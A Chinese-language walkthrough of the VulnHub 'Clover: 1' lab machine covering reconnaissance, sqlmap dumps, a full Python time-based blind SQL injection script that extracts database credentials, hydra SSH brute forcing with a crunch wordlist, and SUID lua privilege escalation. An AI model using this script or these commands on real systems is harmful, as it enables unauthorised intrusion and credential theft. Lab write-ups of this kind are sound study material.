靶机下载地址:
Clover: 1 ~ VulnHub
靶机ip:192.168.174.145
Kali ip:192.168.174.128
靶机ip发现:sudo arp-scan -l
靶机开放端口扫描
分析:
发现开放了21端口ftp服务,且允许匿名登录
22端口ssh服务
80端口和一些其他的
先对ftp进行查看
查看maintenance目录下的内容
使用get将文件下载下来进行查看。
进行locale文件的解密,猜测是base64,没发现有什么用
进行80端口的扫描
gobuster dir -u http://192.168.174.145 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
查看一些其他的信息后在http://192.168.174.145/website/的源码中发现一些注释信息
进行搜索这个cms
https://paper.bobylive.com/Security/LARES-ColdFusion.pdf
在这里发现这个cms的一些信息
进行目录的查看
使用dirsearch.py进行目录扫描
发现登录界面
测试一下是否存在注入
成功注入登录,但没有得到其他的信息
http://192.168.174.145/CFIDE/Administrator/login.php
发现存在延时注入,因此使用脚本进行爆库,首先使用sqlmap进行尝试,因为是post传参,所以抓包的信息存到文本再使用sqlmap
sqlmap -r test.txt --current-db
可以看到当前的数据库名称
查看数据库的表:sqlmap -r test.txt -D 'clover' –tables
查看列信息sqlmap -r test.txt -D 'clover' -T 'users' –columns
查看username和password的信息
sqlmap -r test.txt -D 'clover' -T 'users' -C 'username,password' –dump
进行md5解密
https://www.somd5.com/
当然 这里也可以使用我们自己的脚本来进行时间注入
自己写的脚本,也可以锻炼动手能力。
这是最终的结果图(最后的范围写小了,没显示全信息)
本人比较菜,脚本写的很拉,sqlmap固然好使,但尝试自己写一下也是不错的。之前用过手工的get传参的时间注入,今天做了post的时间注入,原理相同,request库的使用方式使用的json格式而已,学到了。get传参的时间注入可以在我的另一篇文章sqllibs靶场第十关有分享。
附上代码:
import requests
import string
import sys
headers = {"Content-Type": "application/x-www-form-urlencoded"}
all = string.printable
url = "http://192.168.174.145/CFIDE/Administrator/login.php/"
def extract_users():
print("[+] Extracting clover dbname length")
output = []
for n in range(1, 10):
payload = {"uname": "a' or if(length(database())>%d,0,sleep(3)) -- a" % n, "pswd": ""}
r = requests.post(url, data=payload, headers=headers)
if r.elapsed.total_seconds() > 3:
length = n
print(length)
break
print("[+] Extracting clover dbname")
for i in range(1, length + 1):
for char in all:
payload = {
"uname": "a' or if(ascii(substr(database()," + str(i) + ",1))=" + str(ord(char)) + ",sleep(3),1) -- a",
"pswd": ""}
# print(payload)
r = requests.post(url, data=payload, headers=headers)
# print(r.request.url)
if r.elapsed.total_seconds() > 3:
output.append(char)
if char == ",":
print("")
continue
print(char, end='', flush=True)
def table_name():
output = []
print("[+] Extracting clover db table_name")
for z in range(0, 9):
for i in range(1, 9):
for char in '0123456789abcdefghijklmnopqrstuvwxyz,./-+*_':
payload = {"uname": "a' or if(substr((select table_name from information_schema.tables "\
"where table_schema=database() limit %d,1),%d,1)='%s',sleep(3),1) -- a" % (z, i, char),
"pswd": "a"}
# print(url+payload)
r = requests.post(url, data=payload, headers=headers)
# print(r.request.url)
if r.elapsed.total_seconds() > 3:
output.append(char)
if char == ",":
print("")
continue
print(char, end='', flush=True)
def column_name():
output = []
print("[+] Extracting clover db column_name")
for z in range(0,15):
for i in range(1,12):
for char in '0123456789abcdefghijklmnopqrstuvwxyz\,,./-+*_':
# http://127.0.0.1/sql1/Less-9/?id=1' and if(substr((select column_name from information_schema.columns
# where table_name='users' limit 0,1),1,1)='s',1,sleep(5))--+
payload = {"uname":"a' or if(substr((select column_name from information_schema.columns " \
"where table_name='users' limit %d,1),%d,1)='%s',sleep(2),1) -- a" % (z,i,char),
"pswd":"a"}
# print(url+payload)
r = requests.post(url, data=payload, headers=headers)
# print(r.request.url)
if r.elapsed.total_seconds() > 2:
output.append(char)
if char == ",":
print(",")
continue
print(char, end='', flush=True)
def list_data():
output = []
print("[+] Extracting clover db dump password and username")
for i in range(1, 200):
for char in '0123456789abcdefghijklmnopqrstuvwxyz#,@-+=)(*&*/.!+':
payload = {"uname": "a' or if(substr((select group_concat(username,'-',password) from users " \
"),%d,1)='%s',sleep(3),1) -- a" % (i, char),
"pswd": "a"}
# print(url+payload)
r = requests.post(url, data=payload, headers=headers)
# print(r.request.url)
if r.elapsed.total_seconds() > 2:
output.append(char)
if char == ",":
print(",")
continue
print(char, end='', flush=True)
try:
# extract_users()
# table_name()
# column_name()
list_data()
except KeyboardInterrupt:
print("")
print("[+] Exiting...")
sys.exit()
接出来密码我们进行ssh登录
登录成功
使用sudo –l和find / -perm -u=s -type f 2>/dev/null
没发现可以利用的点
发现还有一个用户
尝试上传脚本,权限被拒绝
在var目录看到reminder,得到sword的密码
得到密码是12位但是没给后四位
尝试crunch生成字典进行爆破
crunch 12 12 -t ‘P4SsW0Rd%%%%’ > pass.txt
百分号%的意思的用数组进行填充
使用hydra进行ssh爆破
hydra -l sword -P /home/ycx/Desktop/pas1.txt 192.168.174.145 ssh -f -vV -t 10
-t 延时
-f 找到就停止
-vV 输出详细信息
使用sword进行登录
查看具有suid权限的文件查询find / -perm -u=s -type f 2>/dev/null
进入lua界面
提权网站:https://gtfobins.github.io/gtfobins/lua/
成功root
